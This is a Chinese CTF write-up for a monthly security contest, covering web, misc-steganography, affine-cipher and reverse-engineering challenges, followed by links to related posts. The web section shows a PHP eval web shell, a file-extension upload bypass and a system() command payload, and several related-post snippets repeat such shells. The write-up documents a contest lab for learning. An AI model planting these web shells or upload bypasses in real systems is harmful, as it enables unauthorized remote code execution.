安恒十一月月赛writeup

昨天做了一下十一月的题目,不才只做出来几道

签到web1

这个是十月的原题,因为忘了截图所以只能提供思路

Web消息头包含了登陆框的密码

输入密码后进入上传页面,上传一句话木马1.jpg,

<?php @eval($_POST['cmd']);?>

使用burp将上传文件名改为1.php.jpg

然后post数据发现已经getshell

Flag就在上一层目录里所以post数据:system(‘dir ../’);

得出flag为:flag{698539765730b69026796420b9201e03}

具体可以参考:https://www.jianshu.com/p/e1af7cc3483d

MISC1-Numeric password

题目:

解题过程:

起初并不知道这是啥,然后百度了一下下面的名词,发现

有点意思,然后进去看看,发现了对应关系,

然后一个一个找出来,其中21世纪就是21,是在其他数字记忆表找到的,72-企鹅……

72 78 67 73 93 67 25 20 69 20 20 70 69 68 67 70 24 21 27 67 27 20 25 27 21 72 26 20 18 20 70 70 67 70 72 23 20 95

然后试着去换成ASCII码看看,发现

出现了不可显的ASCII码,那flag肯定不是这个,既然数字已经给定了,编码最有可能是凯撒移位

Payload:

写个脚本爆破一下

exp =[72,78,67,73,93,67,25,20,69,20,20,70,69,68,67,70,24,21,27,67,27,20,25,27,21,72,26,20,18,20,70,70,67,70,72,23,20,95]

flag=""

for i in range(1,127):

    for j in exp:

        flag+=chr(j+i)

    print(flag)

    flag=""

flag为:flag{a72c22dcbad639a92793f8202ddadf52}

MISC2-我的公子在何方

题目:

解题过程:

压缩包是加密的,打开password,直接输入提示错误。

Base64解一下

读一下txt内容

他有提示说:其载体图像是24位的BMP格式图像

百度一下:载体图像是24位的BMP格式图像隐写工具

下载这个工具

尝试打开图片发现需要密码

然后txt提示:并且密码是与图片主人公演绎的剧中相关的人物

百度搜图

天仙配…其实我根本不知道相关人物是谁,然后百度一下演员表一个一个试吧

发现dongyong就是密码,

到网站http://tool.oschina.net/encrypt解密,一时看不出这是什么加密,那就一个一个试,

什么也没,那应该还是加密了…

密码也不知道是什么,看了题解才知道是dongyong…

Payload:

所以flag为flag{97db6057a9a113c3e0a2bfb188a92698}

CRYPTO2-仿射

题目:

解题过程:

题目已经很明了了,是仿射密码,所以到网站http://ctf.ssleye.com/affine.html

解一下,已经提示了b=7那这就好办了,直接爆破a就行

网站也提示了a的取值

在a=9的时候出现了flag

题目要求提交md5所以

Payload:

flag为:flag{e8cb7b46bcf72d62e74100dd19bc63c6}

REVERSE2-Generate

题目:

题目要求输入一个数字然后给出flag

解题过程:

到ida看一下程序的逻辑

程序刚开始有一个Getinput,跟进看一下

提示输入信息,输入到DstBuf,输入的数是16字节然后转换为整数,然后传到int型中

无符号整数v11进入循环,循环32次

V8初始值为0,然后与v11异或,再和异或

疑惑的条件即是判断v7的范围是否在@以上Z以下,且不等于”_”,”{“,” }” ,如果不满足条件提示错误退出,意思就是结果是有范围的,结果在A-Z 和{ } _

接下来的操作是

最后的结果会赋给byte_408040

并且v8会和bayt_404024再次异或,byte_404020为字节

最后每次循环结束都把v11向后移一字节,然后继续进入循环

然后循环完毕后用start函数检测一下结果的开头

Start为

Exp

使用Z3约束解决

X=3658134498

Flag为flag: FLAG{___ZZLOZEZ_Z__AAPHTZIZ____}

原创文章,转载请标明出处 :https://www.cnblogs.com/pureqh

CTF-安恒18年十一月月赛部分writeup的更多相关文章

  1. CTF-安恒18年十二月月赛部分writeup

    CTF-安恒十二月月赛部分writeup 这次题目都比较简单蛤,连我这菜鸡都能做几道. WEB1-ezweb2 打开网站,啥也没有,审计源代码,还是啥都没有,也没什么功能菜单,扫了一下目录,扫到了ad ...

  2. CTF-安恒19年二月月赛部分writeup

    CTF-安恒19年二月月赛部分writeup MISC1-来玩个游戏吧 题目: 第一关,一眼可以看出是盲文,之前做过类似题目 拿到在线网站解一下 ??41402abc4b2a76b9719d91101 ...

  3. CTF-安恒19年一月月赛部分writeup

    CTF-安恒19年一月月赛部分writeup MISC1-赢战2019 是一道图片隐写题 linux下可以正常打开图片,首先到binwalk分析一下. 里面有东西,foremost分离一下 有一张二维 ...

  4. 【CTF】2019湖湘杯 miscmisc writeup

    题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id= ...

  5. 安恒杯2月月赛-应该不是xss

    1. 打开题目一看,是个留言板 2. 查看源码发现有几个js文件 依次打开发现在main.js里存在这样一段代码 3. 访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密 ...

  6. 安恒杯11月月赛web题目-ezsql详细记录

    通过此题目可以学习到 1.通过load_file+like来盲注获取文件内容 2.php魔术方法__get函数的用法 3.bypass  linux命令过滤 题目中给了注册和登录的功能,没有源码泄露 ...

  7. 2018安恒杯11月月赛 MISC

    题目放评论了 Numeric password 这次隐写没有按照套路出牌,很强. 记录一下 看来自主学习的能力很有待提高. 打开Numeric password.txt 中华文化博大精深,近日在教小外 ...

  8. 安恒2018年三月月赛MISC蜘蛛侠呀

    到处都是知识盲区hhh 下载了out.pcap之后,里面有很多ICMP包 看到ttl之后联想到西湖论剑里面的一道杂项题,无果 看WP知道可以使用wireshark的tshark命令提取流量包里面的文件 ...

  9. 【CTF】CTFHub 技能树 文件头检查 writeup

    PHP一句话木马 <?php @eval($_POST["pass"]);?> <?php eval($_REQUEST["pass"]);? ...

随机推荐

  1. Flex Box 简单弹性布局

    弹性盒子模型有两种规范:早起的display:box 和后期的display:flex.它可以轻易的实现均分.浮动.居中等灵活布局,在移动端只考虑webkit内核时很实用. 一.display:box ...

  2. Android横、竖屏幕动态切换(layout-land 和layout-port)

    下面是一个例子程序: 1.首先通过以下语句设置Activity为无标题和全屏模式: // 设置为无标题栏 requestWindowFeature(Window.FEATURE_NO_TITLE); ...

  3. zookeeper应用 - leader选举 锁

    模拟leader选举: 1.zookeeper服务器上有一个/leader节点 2.在/leader节点下创建短暂顺序节点/leader/lock-xxxxxxx 3.获取/leader的所有子节点并 ...

  4. BaseDAL数据层基类1

    /// <summary> /// EF数据库操作基类 /// </summary> /// <typeparam name="T"></ ...

  5. 显示脉冲效果的PulsingView

    显示脉冲效果的PulsingView 效果如下: 源码: PulsingView.h 与 PulsingView.m // // PulsingView.h // PulsingView // // ...

  6. qmake

    https://blog.csdn.net/m0_37876745/article/details/78537556

  7. redis几种数据类型以及使用场景

    1. string类型 string为最简单类型,一个key对应一个value set mykey "wangzai" ##设置key,第二次赋值会直接覆盖之前的 setnx my ...

  8. 关于Tomcat端口出现的问题

    =Several ports (8005, 8080, 8009) required by Tomcat v7.0 Server at localhost are already in use. Th ...

  9. (matlab)plot画图的颜色线型(转)

    http://wenku.baidu.com/link?url=SVVMVH8QlDIu2hVKDtoBYs6l0CnQvFnFHJJ9yexmYVKQqhz47qIr7aK7LOf8nN0qNdy8 ...

  10. JSTORM 问题排查

    ## 运行时topology的task列表中报"task is dead"错误有几个原因可能导致出现这个错误: 1. task心跳超时,导致nimbus主动kill这个task所在 ...